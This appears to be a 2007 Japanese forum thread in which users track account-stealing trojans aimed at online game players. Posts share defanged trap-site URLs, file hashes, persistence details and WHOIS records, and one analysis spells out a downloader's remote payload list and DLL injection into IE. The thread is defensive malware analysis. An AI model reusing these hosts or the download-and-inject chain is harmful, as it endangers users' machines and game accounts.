UPack圧縮のようですが、私の手持ちのソフトではUPackとして認識できませんでした。
VirusTotalでは、NSANTI, UPACKと表示されます。

523 名前:522:07/05/26 04:03 ID:EGaEc4Ke0
誤解を招くかもしれないので補足しておきますと、

> 上記すぺてに共通↓
> カスペルスキー検出名:Trojan-PSW.Win32.Maran.fk
> → %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
> → %WinDir%\system32\tjviwer.dll   (Winsock Providerに登録)

というのは、どれに感染しても、同じ名前のファイルが作成され、サービスやWinsockに登録されるのも同じという意味で、
作成されるファイルの中身まで完全に同じという意味ではありません。
(といってもsvchost.exeは完全一致し、tjviwer.dllも相違箇所は100バイト程度しかありませんが)

>>522のjpxpie6-7netに関しては、ファイルの中身まで完全に一致しましたよ、という意味です。

524 名前:(^ー^*)ノ〜さん:07/05/26 10:11 ID:EGaEc4Ke0
●新パック型maran(>>521)の感染後調査

@MD5:0934AD466DF075F92D6C47C586F39421 www■acyberhome■com/game/svch■exe■virus
AMD5:9AE3A12B307346F3E4FBD324A7C00B7B → %WinDir%\svchost.exe
BMD5:A2C67ACCCE9F1DA9034030B8C67495C1 → %WinDir%\system32\tj7viewer.dll

CMD5:E4C52AB61E57C31A7090529D3F5FF114 www■acyberhome■com/link/server■exe
DMD5:95A3CE582DEDDF276C263F660F8C848D → %WinDir%\svchost.exe
EMD5:E852E42DE3F3148AA41FBAE027BB2CF8 → %WinDir%\system32\tj9viewer.dll

AD サービスに登録(サービス名ADIDown 表示名Power Adapter)
BE Winsock Providerに登録

Trojan-PSW.Win32.Maran.cj @ABC
Trojan-PSW.Win32.Maran.ei DE

前者は>>467で調査したものと、感染後ファイルのMD5が一致します。
つまり「中身は古いがパッカーが新しい」ものと思われます。

525 名前:(^ー^*)ノ〜さん:07/05/26 10:13 ID:EGaEc4Ke0
●台湾向けmaranの感染後調査

@MD5:7529CAC509BD1C89CD7FE3500B4A18E7 www■gamanir■com/2007mmm■exe
AMD5:A41869E28288F6E25CEAF0EAB5845847 → %WinDir%\avp.exe
BMD5:50813D8795F9AAD495E4DB7B7908DA4F → %WinDir%\system32\hsvwer9.dll

CMD5:003DF3296DB109CC26F5AD1C08AC9A39 www■twyaooplay■com/gisl■exe
DMD5:EE452E2BA0B7EEA67965BA7D16035267 → %WinDir%\avp.exe
EMD5:F4B0BB0BE8A50D57CBFD1EE19F546B1A → %WinDir%\system32\hs3midia.dll

AD サービスに登録(サービス名VGADown 表示名Audio Adapter)
BE Winsock Providerに登録

Trojan-PSW.Win32.Maran.gen @
Trojan-PSW.Win32.Maran.ev AB
Trojan-PSW.Win32.Maran.cs C
検出不可 DE

@のパッカー:PECompact 2.x -> Jeremy Collake
Cのパッカー:Upack 0.3.9 beta2s -> Dwing

数日前に差し替えられたものです。jROはターゲット外かもしれませんが、一応調査しておきました。
新しいパッカーは使われてません。

526 名前:(^ー^*)ノ〜さん:07/05/26 11:58 ID:yWNa998j0
肥大化しているのはnsAntiかけた上でUpackかけたからかな
(Dwingは最近エロゲの翻訳に夢中でUpackは0.399で止まってる)。
nsAnti自体がググってもBloodhoundなどばかりが引っかかるので
その手の用途を目的としたPackerなんだろうね。
(配布も77169とか520hackとか物騒なとこばかり)。

527 名前:(^ー^*)ノ〜さん:07/05/26 12:11 ID:yWNa998j0
って今カスペのサイト見たらMaran.flまであった。
これはどこがターゲットなんだろう…。

528 名前:(^ー^*)ノ〜さん:07/05/26 17:14 ID:QQkQspRR0
「.com」とか禁止ワードにしていたら新しい書き込みが
該当するページはソースチェッカーで見てみると赤文字で
「Page was deleted from this hosting」と書かれているだけで
なんのリンクもないページのようでした
aguesによるとロシア モスクワ
ロシアは情報等に規制が厳しそう(イメージ)なので即効き消されたのかも?

chain-saw-sharpeners■dll7■info/

コメント書き込み自体は「: , ""」とか「, , !」という(「」除く)というイミフなもの
書き込み名前は「cordless chain saw」で2回書き込みがありました。
ホストはocnっぽいけどどうも串刺してる様子?

529 名前:(^ー^*)ノ〜さん :07/05/26 18:44 ID:PpU5c8N40
>>528
いまのところ、中華のハッキングなのかエロサイト業者のスパムなのか
すでにページが存在してないのでわからないです。
そのページはしばらく様子をみるしかなさそうです。

530 名前:(^ー^*)ノ〜さん:07/05/26 19:35 ID:yWNa998j0
ただのスパム(誰かがスパム投稿プログラムを踏んだとか)じゃない?
ttp://www.google.co.jp/search?hl=ja&q=%22chain-saw-sharpeners%22
ttp://www.google.co.jp/search?hl=ja&q=%22chainmillsaw%22
チェンソー砥ぎ器? 砥石? て海外では需要あるんかねぇ。で、>>512

531 名前:(^ー^*)ノ〜さん:07/05/27 00:34 ID:6OgLIpbZ0
毎度おなじみ福建人の新ドメイン3つ。
登録情報同じなんで2つ目からはドメイン名と期限だけ。

Domain Name ..................... romaker■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-05-25 06:49:32

Domain Name ..................... sagewikoo■com
Expiration Date ................. 2008-05-25 06:30:08

Domain Name ..................... wiki-house■com
Expiration Date ................. 2008-05-25 06:49:12

532 名前:(^ー^*)ノ〜さん:07/05/27 05:19 ID:WPeASfQn0
http//www.ragnarok2■co■kr/teaser/index■html

すいませんro2で検索したらこうゆうURLの韓国語のページに飛んだんですが
これって垢ハックURLなんでしょうか。どなたか教えてくださると幸いです。

533 名前:(^ー^*)ノ〜さん:07/05/27 05:41 ID:LDXe+J5o0
>>532
何をもって、そのサイトがアカハックかもしれないと思ったかを聞かせて欲しいね。
そして以降のレスはLiveRO版でよろ。

534 名前:(^ー^*)ノ〜さん:07/05/27 08:50 ID:eT2TMEA00
>>532
ragnarok2.co.kr はRO2の韓国公式サイト。
これ以上は言わなくても分かるよな?

535 名前:(^ー^*)ノ〜さん:07/05/27 12:01 ID:6OgLIpbZ0
毎度おなじみ福建人のドメイン群、リネージュ資料室に現時点で記載なし。
サイトTOPは全て共通の語句になっている。
なんちゃってアメブロ初登場。
数字入りドメインで8が目に付くのはあっちでは縁起ものだから。

www■twreatch■com
www■love888888■com
www■tooalt■com
www■antuclt■com
www■litcan■com
www■saussrea■com
www■muantang■com
www■fotblong■com
www■lzy88588■com
www■ameblog-jp■net
www■luobuogood■com
www■yahoodoor-blog■com
www■tuankong■com
www■ourafamily■com
www■emeriss■com

536 名前:(^ー^*)ノ〜さん:07/05/27 12:12 ID:vFeGC+Js0
>>531
sagewikooってSageWikiのなんちゃって(?)なのか?

wiki-house は明らかにwikihouswのなんちゃってドメイン


>>535
ameblog はアメーバブログのなんちゃって系か

なんちゃってとか有名サイトのタイトルパクリ・なんちゃってが多い傾向にあるな

537 名前:(^ー^*)ノ〜さん:07/05/27 12:33 ID:6OgLIpbZ0
535のourafamily、中にはかなり前に使われていたものが残っている。
台湾のセキュア系サイトに情報があった。

www■ourafamily■com/new/line■exe

VIRUSTOTALでもモノが古すぎて検出しないほうが少ない。

538 名前:(^ー^*)ノ〜さん:07/05/27 15:20 ID:xIUGn8gM0
初歩的な質問で申し訳ありませんが教えてください。
デスクトップとノート2台のPCが同一ネットワーク上にあり、
どうやらデスクトップの方で垢ハックサイトと思われるサイトを踏んでしまったようです。
現在デスクトップの方はウイルススキャンをかけています。

この場合ノートPCからのパス変更、またはROへのログイン等はしても問題ないのでしょうか?
お手数おかけしますがどなたか回答お願い致します。

539 名前:(^ー^*)ノ〜さん:07/05/27 15:48 ID:LDXe+J5o0
アカハックサイトを踏んでから、一度もパスを打ち込む行為をしていないなら、
パスが抜かれることはありえないので、安全が確認できるまでパス変更もROへのログインもしない方が良いです。

ネットワーク感染がありうるかどうかは、一概には言えません。
(増殖能力を持つアカハックウイルスというのは、今のところ報告が上がってなかったとは思いますが)

踏んだサイトがどこなのか分かれば、より精度の高い回答ができると思うので、
テンプレ>>4で報告した方が良いでしょう。

540 名前:538:07/05/27 16:27 ID:xIUGn8gM0
>>539
回答ありがとうございます。
では改めてテンプレにて報告させていただきます。

【  アドレス   】 http://www■aaa-livedoor■net/ro-navi/
【気付いた日時】 踏んだあと即時
【     OS    】 WindowsXP Service Pack2
【使用ブラウザ 】 Mozilla Firefox 2.0.0.1
【WindowsUpdateの有無】 正確な日時は不明。多分ここ2-3日中に行ったと思われる。
【 アンチウイルスソフト 】 NortonInternetSecurity2005
【その他のSecurty対策 】 Spybot S&D、Ad-aware 等
【 ウイルススキャン結果】 カスペルスキーオンラインスキャンを現在実行中。
【スレログやテンプレを読んだか】 Yes
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】
最近騒ぎが大きくなっているので気をつけてはいましたが、
ついボーっとしてて何の気なしにRMCを閲覧している時に踏んでしまいました。
リンク先が真っ白で何も表示されなかったため、すぐにおかしいと気づき閉じました。

ちょっと気が動転しアドレスを踏んだ後に何度かログインを繰り返してしまったので、
友人に頼んでガンホーIDのパス、ログインIDのパスを変更してもらいました。

オンラインスキャンがまだ終了していませんが、この後NortonInternetSecurity2005
、Spybot S&D、Ad-Awareにてスキャンを行う予定です。
他に何か必要事項があればお教えください。追記いたします。

以上

541 名前:(^ー^*)ノ〜さん:07/05/27 17:19 ID:LDXe+J5o0
>>540
www■aaa-livedoor■net/ro-navi/
を踏んだ場合、MDAC脆弱性またはANIカーソル脆弱性を利用して、以下のファイルをダウンロードして実行します。
www■ro-bot■net/ro-navi/yan■exe
Windows Updateを行っていれば、ダウンロードは失敗するはずです。
MDAC脆弱性に関しては、VBScriptで記述されているため、
VBScriptを実行できないFirefoxはこの点において安全です。

上記yan.exeの最終更新日は日本時間で5/27 3:49です。KasperskyおよびSymantecで検出可能です。
Kaspersky: Trojan-PSW.Win32.Maran.ei
Symantec: Bloodhound.NsAnti

以上を踏まえると、感染していない可能性が非常に高いと思われます。
カスペルスキーとノートンのウイルスチェックで何もでなければ恐らく大丈夫でしょう。
(恐らくとしか言えませんので、最終判断は自己責任でお願いします)

542 名前:(^ー^*)ノ〜さん:07/05/27 17:31 ID:VGNskWPO0
げー、またMaran更新されてるのか…。
>>519 からあたりのは何か別なPacker(というか暗号化?)使った後に
Upackしてるっぽいなぁ。各社苦戦するようになってきた。

543 名前:(^ー^*)ノ〜さん:07/05/27 22:28 ID:VGNskWPO0
白状しよう。SymantecのBloodhoundが
ヒューリスティックの意味だと今知った。
# そういうトロイがあるのかと必死にググったぜ。

544 名前:テンプレ ◆/II.DEADh.:07/05/28 02:21 ID:L1yd9wFK0
たった今来たやつ
netgamero■net
先週更新したスパムフィルタと外部チェッカーが動作しなかったので注意。

545 名前:(^ー^*)ノ〜さん:07/05/28 02:32 ID:L1yd9wFK0
ぐあ、名前が。
念のため上げときますね。

546 名前:(^ー^*)ノ〜さん:07/05/28 05:59 ID:CEIjY3Zk0
>>544の奴、いつもの福建人のだけど、
登録時間から取ってすぐ使い始めてる。
記事の時間から24時間経過してないし。

Domain Name ..................... netgamero■net
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-05-27 05:04:49

547 名前:(^ー^*)ノ〜さん:07/05/28 14:35 ID:BUaX6osW0
【  アドレス   】 www■thtml■com
【気付いた日時】 2007/05/28
【     OS    】 XP SP2
【使用ブラウザ 】 FireFox2.0.0.3
【WindowsUpdateの有無】 正確には不明。アップデート自体は随時。
【 アンチウイルスソフト 】 McAfee(SecurityCenter)
【その他のSecurty対策 】 ルータくらい
【 ウイルススキャン結果】 まだ
【スレログやテンプレを読んだか】 Yes
【hosts変更】 有(2007/04/06 読み取り専用)
【PeerGuardian2導入】 有(リネージュ資料室)
【説明】
PG2のブロックログにひっかかっていたのでリネ資料室を見たら同ドメインがリスト内にあったことを発見。
(05/06に3回ほどブロックして以後特になし)
現状被害は無し。
まとめサイトの危険ドメインリストには同ドメインの記載がないが、リネ専用?

548 名前:(^ー^*)ノ〜さん:07/05/28 15:01 ID:45o8dPmJ0
>>547
既に撤退しているものと思われ。
業者がドメインの売却先を探しているようにしか見えん。

549 名前:(^ー^*)ノ〜さん:07/05/28 15:46 ID:+CCqcNqe0
×まとめサイトのリストにない=リネ専用
○まとめサイトのリストにない=このスレで報告されてない

スレで上がった情報をまとめてくれてるのが、まとめサイト。
まとめサイトの人が自分で見つけた場合は別だろうけど、基本的にスレで報告が
無かった場合は載ってない。

でも転売のドメインに対してアクセスしてて、PG2が反応ってのも変な話な気がするなぁ……


後アカハックには直接関係ないけど、こういう記事が。

>リッチテキストマルウェアがウイルス対策ソフトの盲点を突く?
>ttp://www.itmedia.co.jp/enterprise/articles/0705/28/news011.html

この手法で仕込んでくるケースは稀だと思うけど、お気を付けを。

550 名前:(^ー^*)ノ〜さん:07/05/28 16:12 ID:iQP6uS0L0
PG2はIP単位でしかブロックできないから、
仮に同一IP上にページ数が1000あって、うち罠が置かれてるのが1ページだけだとした場合、
そこをブロックすれば、999の無罪なページもブロックすることになるからね。

64■14■244■60
www■adfka■com
www■thtml■com
はすべて同じIP使ってるけど、表示される内容は違うしね。

64■14■244■60に関しては、中華が所持してるIPっぽくないし、
某旅行会社みたく過去に踏み台にされたことがあったから登録されてるってパターンじゃないのかね。

551 名前:(^ー^*)ノ〜さん:07/05/28 16:16 ID:BUaX6osW0
>>548-550
さんくす。

552 名前:(^ー^*)ノ〜さん:07/05/28 16:27 ID:wEhDrowx0
>>547
アカハッカーがドメインを使い捨てて有効期限が切れたのをアメリカのだれかが
拾ったものと推測。多分ドメイン転売erかね。勿論確証は無し。
どうもそういう感じなドメイン名もちらほら出てきている(lovetw系だったavtw1068■comとか)
のを考えるとアカハッカーの暗躍も結構続いているんだなぁ、と嘆息。

>>549
多分、ドメイン名からIPを引いてそれをPG2のリストにしている
(ある意味機械的処理)と思うから引っかかっても不思議なじゃ無い気がする。
Created: 10-jun-2006
で結構(拾われた?のが)古めだし。

553 名前:(^ー^*)ノ〜さん:07/05/28 17:09 ID:+CCqcNqe0
>552
PG2のリストに登録されてるのは別に不思議じゃないんだが

>05/06に3回ほどブロックして
とあったのが気になっただけね。

……って、5月6日じゃなくて、2005年6月って意味?

554 名前:(^ー^*)ノ〜さん:07/05/28 17:15 ID:BUaX6osW0
いや、今月6日っす。

んでもって再度見たら3回じゃなくて2回だった。
特になんかした覚えはないんだけどなー…一応その後カスペルもかけてみて何もなし。

555 名前:(^ー^*)ノ〜さん:07/05/28 17:28 ID:iQP6uS0L0
>>554
547にはwww■thtml■comと書かれているけど、それはあくまでも、PG2のブロック履歴みて、
リネージュ資料室の危険ドメインリストからドメイン名を引いたというだけで、実際に踏んだのは、
www■adfka■com なのか
www■seek2■com なのか
www■thtml■com なのかとか、分からないわけだよね?

>>553
普通にネットサーフィンしてて、たまたま上記リンクを踏んだか、
ページ内に上記ドメインへの参照(imgタグなど)があったらブロック履歴は残るわけで、
別に不思議でもなんでもないと思いますが。

556 名前:(^ー^*)ノ〜さん:07/05/28 17:56 ID:BUaX6osW0
ブロック履歴の名前欄がwww■thtml■comになってますね。
実際にどう踏んだのかは不明です(

557 名前:(^ー^*)ノ〜さん:07/05/28 18:07 ID:CEIjY3Zk0
thtml■comだがリネージュ資料室の感染源サイトページに出ている。
かなり古い為下のほうにある。
lineage.nyx.bne.jp/misc/security/?id=virus-site

サイト名を伏せている為、ページ上からthtmlを検索すると出る。
2005年頃に実際使ったことは間違いない。

−−−引用ここから
2005/4/27確認
各ページ内に次のようにiframeを使い、 画面上表示させずに外部のファイルを読み込んでいる箇所があります。
<中略>
伏せてあるドメイン部には thtml が入ります。 このbanner■htmlは、 OSのバッファオーバーフローの不具合を利用して、 ブラウザにプログラムを勝手にインストールさせる種類のトラップです。 ウィルス対策ソフトによっては、このファイル自体をウィルスとして検出します。
インストールされてしまった場合、 リネージュのIDとパスワードを盗み出すトロイの木馬に感染します。
Internet Explorerの不具合を悪用した手口のため、 IEエンジンを使っていないFirefoxやOperaなどのブラウザを使用していれば感染しません。
−−−ここまで

558 名前:(^ー^*)ノ〜さん:07/05/28 18:15 ID:iQP6uS0L0
>>556
なるほど。ちなみに、名前欄に出てくる名称は、分かりやすく名前を付けてあるだけなので、
実際にどのドメイン名で踏んだのかをあらわしているわけではないので、念のため。
コマンドプロンプトからPINGを打ってみると、同じ名称でブロックされるのが分かるでしょう。
ping www■nokiaaccessories■com
ping www■sonynotebook■com
ping www■thtml■com

PG2にはURL名を判断する機能はないので、同じIPならまとめてブロックされてしまうわけです。
危険リストが純粋なブラックリストであれば良いのですが、実際にはグレーリストも混じっているので
中韓台リストでなくても、無害なサイトがブロックされることがあるということを
念頭に置いておいた方が良いでしょう。

559 名前:(^ー^*)ノ〜さん:07/05/28 19:34 ID:+CCqcNqe0
>555
IPが登録されていたらPG2は反応するからそれ自体は別に不思議じゃないけど
過去にグレーなIPとして登録されていたものを最近になって踏んだ、という事が
気になった、って事。

今現在が無害なIPならいいんだけどね。

560 名前:(^ー^*)ノ〜さん:07/05/28 19:53 ID:FLsyJwBA0
>>549
ITMediaの記事、ちょっと理解できていないんだけれども、
どういうときに盲点が突かれるんだろう。

拡張子 *.rtf な怪しいファイルをダウンロードして開くと
その内側からOLE経由で PDFやらTXTに偽装されたexeを実行する?

561 名前:(^ー^*)ノ〜さん:07/05/28 20:02 ID:L1yd9wFK0
福建人の登録IP探るのってどうやるんですか?
これから登録即攻撃になりそうなんで早めに情報得たいんですが。

562 名前:(^ー^*)ノ〜さん:07/05/28 20:17 ID:8mVoCqzt0
俺もやり方知らないが、奴らもここを見ているっぽい関係上、書くと覗けないように塞いできたりはしないかなぁ・・・

563 名前:(^ー^*)ノ〜さん:07/05/28 20:59 ID:ovCyfy+60
>>560
ttp://www.avertlabs.com/research/blog/index.php/2007/05/25/rich-text-malware/
RTFに埋め込むといくつかのアンチウイルスをスルーしたまま
(メールなどで)届けることが可能、というお話。
OLEオブジェクトを起動した時点でトラップされるんじゃないか?
とかはまた別の話。あくまでブログのネタなので。

564 名前:ま@1週間ほど多忙 ◆sp4Sh9QXGI:07/05/28 21:37 ID:+r29ZH+N0
某大手ドット絵投稿掲示板より採れたてを一つ。

www■playboss-jp■com
IP → 203.171.230.39

登録者名は“liu huangjun”と、いつもの福建人ではない模様?
RO系の善良サイトを装い(本物はぐぐればすぐに出てきました)、
iframeから
www■playboss-jp■com/real_cgi/real■htm
を呼び出しています。
ソースチェッカー逃れなのかどうかはわかりませんが、
ソースは全てJavascriptのescape関数によってどえらいことになってます。
ココから先は解読が可能な方にお任せします orz

565 名前: ◆sp4Sh9QXGI:07/05/28 21:47 ID:+r29ZH+N0
えぇと、どうにか文字列をデコードできるサイトを見つけまして

www■playboss-jp■com/real_cgi/hua■exe
とie.exeとie.vbsを呼び出すような挙動をするようです。
(この辺の細かい挙動がわかる方、お願いします)
一ついえることは、javascriptで全て動いていますので、
無効にしておけばこれらが実行されることはないでしょう。

ソースなどを見る限り、zhawangjpやlovetw等とは違うグループなのかな?

566 名前:(^ー^*)ノ〜さん:07/05/28 22:22 ID:ovCyfy+60
んー、「Rar!」は前に見たなぁ。
www■playboss-jp■com/real_cgi/hua.exe
前はMSXMLだけだったのが、MSXML2とXMLHttpRequestも試すのが新しいか?
AJAXではこの試行による分岐は多くのブラウザで動かすためのいわば定石
(IE6はXMLHttpRequestが実装されていないためMSXMLを使うしかない)。
お勉強したのかな? 後半のぐちゃぐちゃ書いてあるのはCLSIDなのでスルー。

567 名前:(^ー^*)ノ〜さん:07/05/28 22:49 ID:/aFoJ9C50
www■playboss-jp■com/real_cgi/hua.exe

NOD32 : Win32/TrojanDownloader.Delf.ADE トロイ の亜種(自動提出発動)
Kaspersky : すりぬけ

ちょっと検体提出行って来るわ。

568 名前:(^ー^*)ノ〜さん:07/05/28 23:03 ID:ovCyfy+60
むむむ。hua.exeを見てみたが、今までの奴とは明らかに違う。
予想だけど、こいつ前に見たことがある。
スキルはいつもの福建Maran部隊とは比較にならんので注意されたし。

569 名前:(^ー^*)ノ〜さん:07/05/28 23:04 ID:iQP6uS0L0
>>564-566
クラスIDについて、レジストリエディタで検索かけたのと、ググって調べた結果↓

BD96C556-65A3-11D0-983A-00C04FC29E36  RDS.DataSpace
AB9BCEDD-EC7E-47E1-9322-D4A210617116  Business Object Factory
0006F033-0000-0000-C000-000000000046  Microsoft Outlook 8.0 Object Library
0006F03A-0000-0000-C000-000000000046  Microsoft Outlook
6e32070a-766d-4ee6-879c-dc1fa91d2fc3  MUWebControl Class
6414512B-B978-451D-A0D8-FCFDF33E833C  WUWebControl Class
7F5B7F63-F06F-4331-8A26-339E03C0AE3D  WMI Object Broker
06723E09-F4C2-43c8-8358-09FCD1DB0766  VsmIDE.DTE
639F725F-1B2D-4831-A9FD-874847682010  DExplore.AppObj.8.0
BA018599-1DB3-44f9-83B4-461454C84BF8  VisualStudio.DTE.8.0
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19  Microsoft.DbgClr.DTE.8.0
E8CCCDDF-CA28-496b-B050-6C07C962476B  VsaIDE.DTE

ハーバード大学のブログに似たようなエクスプロイトコードを発見。多分このあたりをベースに書いたんだろうなあ。
ttp://blogs.law.harvard.edu/zeroday/2006/12/page/2/

570 名前:(^ー^*)ノ〜さん:07/05/28 23:05 ID:CEIjY3Zk0
>>564
ちょっと調べてみたんだけど、
登録情報のplayboss-jpのメアドは
idc-8■comと言う何らかのサービスサイト?に表示されてるメアドそのものだ。
ことごとく対策をされているため注意を逸らそうとしていると見る。
連中の行動からそう考えておくのが賢明。

余談だが
過去には罠ドメイン登録情報で福建省の住所を書きながらFJ(福建)のFの字を弄って
BJ(北京)にしていたものがあった。

571 名前:(^ー^*)ノ〜さん:07/05/28 23:32 ID:ovCyfy+60
くそ、ダミーまで仕込みやがって…。
検体送ってくる。

572 名前:(^ー^*)ノ〜さん:07/05/28 23:40 ID:/aFoJ9C50
>>567
www■playboss-jp■com/real_cgi/hua.exe

トレンドマイクロ:Undetected Malware / Pending

発見できないマルウェア/処理待ち…ということなので、近いうちにパターン更新されることでしょう。

>>571
LiveROの方に報告先一覧のあるところは全て検体提出済みです。
571さんの解析結果つけて報告すれば、対応が速くなる…かも?

573 名前:(^ー^*)ノ〜さん:07/05/28 23:44 ID:CEIjY3Zk0
hua■exeを23時35分にVIRUSTOTALにかけてみたところ。
メジャーものではNOD32以外芳しくない。
マカフィー、シマンテックすり抜け。

検体送付、と。

574 名前:(^ー^*)ノ〜さん:07/05/28 23:54 ID:ovCyfy+60
こっちはhua.exeのままでは送っていないのでかぶらないと思う。
フェイクの電卓を踏んだぜちくしょー。

575 名前:(^ー^*)ノ〜さん:07/05/29 00:21 ID:lbJkZYsk0
ttp://www.mmobbs.com/uploader/files/2671.png
ええ、どう見ても中国語版WindowsXP付属の電卓です
(もちろんフェイク。本命はちくしょーの方)。

576 名前:(^ー^*)ノ〜さん:07/05/29 00:42 ID:uWZRqUHw0
>>565
とりあえず、ざっと分かったことだけ。

@MD5:8090868B542B27E2C92879A0DDFF4374 www■playboss-jp■com/real_cgi/hua■exe
AMD5:BC90090F4E131836BC492469D5D26C28 → C:\Program Files\explord.exe
BMD5:B46FBDE092651D31FACA3BE6E459258D → %WinDir%\system32\systemlj.dll

カスペルスキー
現時点では@ABすべて検出不可

@を実行と同時に下記IP宛てに何かが送信される。
125■65■112■95:80 (TCP)

Aは下記のレジストリに登録され、次回以降自動で起動される。
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

BのDLLは稼動中の他のプロセスにインジェクションされることを確認。

Aのファイルの中に下記のURLが埋まっていた。
http://ff11ma■vicp■net/888■txt

577 名前:(^ー^*)ノ〜さん:07/05/29 01:00 ID:lbJkZYsk0
乙です。
仮想環境で遠慮なく踏めればいいんだけどなぁ。
ちなみに888.txtを拾ってくると6666.exeが書いてあって、
それが電卓(もちろん今後も無害とは限らない)。

ff11ma(略)はFF11のトロイの攻防戦で見かけたドメイン。
当時の奴と中の人が同じなら、リネやROでは飽き足らず
FF11やマビノギや信長のトロイまで作った奴。

578 名前:(^ー^*)ノ〜さん:07/05/29 01:27 ID:UKFJo87S0
>>567
カスペから返答。(報告 22:54/返答 0:29)

hua.exe - Trojan-Downloader.Win32.Delf.ade

次回アップデートで対応とのこと。

579 名前:(^ー^*)ノ〜さん:07/05/29 01:39 ID:7fmVjrR10
仮想PC+Ubuntuの捨て駒環境を作って踏んでみたんだけど
何も起こらなかったのは仕様?

自力でhuaをDLしにいったら拾えたけど、ff11maには繋がらなかったし
ここでの報告を見て何かリアクション起こしたんだろうか?

しかしこのJavaScript、手が込んでるというか何というか。
自力でデコードしたけど、見て思わず笑ってしまった。
でもなんとなく、実験的コードに見えたのは自分だけかなぁ?

580 名前:(^ー^*)ノ〜さん:07/05/29 01:55 ID:7fmVjrR10
追記

wgetで今検体拾いに行ったら、カスペが反応。
>578にあるように、Trojan-Downloader.Win32.Delf.adeとしてhuaを検出しました。

ttp://www.viruslistjp.com/search?VN=Trojan-Downloader.Win32.Delf.ade&referer=kis

581 名前:(^ー^*)ノ〜さん:07/05/29 03:02 ID:3P1xr1f50
いつもおつかれさまです。いったん警告age

582 名前:(^ー^*)ノ〜さん:07/05/29 09:50 ID:uWZRqUHw0
>>576の「@を実行と同時に下記IP宛てに何かが送信される」の具体的なURLが判明しました。
実際には送信ではなく受信なんですが・・・
http://www■jpxpie6-7net■com/muma■txt

上記ファイルの中身↓
---ここから---
http://www■jpxpie6-7net■com/server■exe
1.0
http://www■jpxpie6-7net■com/svch■exe
1.0
---ここまで---

Trojan.Downloaderである以上、何らかのファイルをダウンロードしに行くはずですが、
恐らくその情報をmuma.txtから取得しているということでしょう。
ちなみにIEを起動するたびに、muma.txtを取得しに行く仕様になってます。
感染すると常に最新のトロイを落とせる素敵な環境になってしまうわけですね(涙)。

推測ではありますが、hua.exe(あるいはexplord.exe)は、自分自身でトロイをダウンロードしに行くのではなく、
IEにsystemlj.dllを強制挿入することにより、ダウンロード作業をさせていると思われます。
FWで不信なプロセスをブロックする手法では、防げない可能性が高そうです。

583 名前:582:07/05/29 11:18 ID:uWZRqUHw0
582の補足です。

>ちなみにIEを起動するたびに、muma.txtを取得しに行く仕様になってます。

正確にはiexplore.exeという名前のファイルを実行したときに、muma.txtを取りに行くようです。
メモ帳だろうがなんだろうが、iexplore.exeという名前にすれば、取りに行きますし、
本物のiexplore.exeも別の名前にリネームすれば取りに行きません。

と言っても、iexplore.exeは脅威の復元能力を持ってるっぽいので、
名前を変えたところで、すぐに元の名称で復活してしまいますがorz。

なお、普段IEを使ってない人は大丈夫かというとそんなことはありません。
hua.exeとexplord.exeが、勝手にIEを起動してしまいますので。

584 名前:(^ー^*)ノ〜さん:07/05/29 14:46 ID:dBwwOIFA0
とにかく踏まないこと(WindowsUpdateなどをしておく、
IEのセキュリティ設定を既定かそれ以上にしておく)が
鉄則ですねぇ。

585 名前:(^ー^*)ノ〜さん:07/05/29 19:25 ID:RfN/1Ckc0
先ほどメッセンジャーにこんなものが
2007/05/29 18:58:30 Christian Check this out Give me your opinion http://21956■buhiokasdeintionsa■com/237/9287/

ウイルス対策ソフトが即座にウイルスが含まれていることを知らせてくれましたが
新手の垢ハックでしょうか?

586 名前:(^ー^*)ノ〜さん:07/05/29 19:30 ID:T4PFfMSV0
上海かw

587 名前:(^ー^*)ノ〜さん:07/05/29 19:37 ID:6L7YyFpM0
>585
微妙にスレ違いな気がしないでもないが
>21956■buhiokasdeintionsa■com/m11/file■exe

>ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_STRATION.IH
ウィルスバスターでは「TROJ_STRATION.IH」として検出されるが詳細不明。
ワームの一種で垢ハックとは関係ないと思われる。

※だから無害というわけではない

588 名前:(^ー^*)ノ〜さん:07/05/29 19:44 ID:UKFJo87S0
まちがってLiveROに投稿してたのでこっちに。hostsでブロックしてたので多分既出だと思う。

鯖板に貼られたリンク。確認した所、ソースの中にはっきりとファイル名がありました。
ソースチェッカーオンラインでは、安全度100%と出ますが信用しないように。 (←この辺だけ注意)
ファイル自体は、Maran.FFのようです。

http://www■blog-ekndesign■com/wiki/see■exe

−以下、投稿された内容−
1 Saraの中の名無しさん 07/05/29 16:49:11 ID:vDHKlg1c
もう限界デスヨ

ttp://www■blog-ekndesign■com/wiki/
↑に引っ越しました。
MSNとここのGv動画のログだけ移しました。
というわけで今後は上のリンク先で更新します。

589 名前:(^ー^*)ノ〜さん:07/05/29 19:55 ID:ABAsdpTh0
>>585
ttp://www.avast.com/jpn/win32-warezov-family.html
ttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=154565
そのspamを踏めばゾンビPCの仲間入りする可能性大。

590 名前:(^ー^*)ノ〜さん:07/05/29 20:03 ID:UKFJo87S0
>>576
検体提出先で解説ページがupされた模様。(メール貰った直後はページが存在しなかったw)

For information on Troj/Dloadr-AYW please see:
ttp://www.sophos.com/virusinfo/analyses/trojdloadrayw.html

576の解説と同じ説明よりちょっと簡易な説明かも。

591 名前:(^ー^*)ノ〜さん:07/05/29 20:32 ID:RfN/1Ckc0
ゾンビPCとは何でしょう・・・?
ファイル保存や実行はしていませんが危険ですか?

592 名前:(^ー^*)ノ〜さん:07/05/29 20:40 ID:GVfo7p9J0
>>591
ゾンビPCってのは、罠踏んだ被害者が、今度は加害者になるってことだよ。
そのまま放置してると、タイーホとかあるので気をつけてくださいね。

593 名前:(^ー^*)ノ〜さん:07/05/29 20:44 ID:UKFJo87S0
>>591
垢ハックと直接関係のない質問は、次からはLiveROのスレでよろしく。

インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
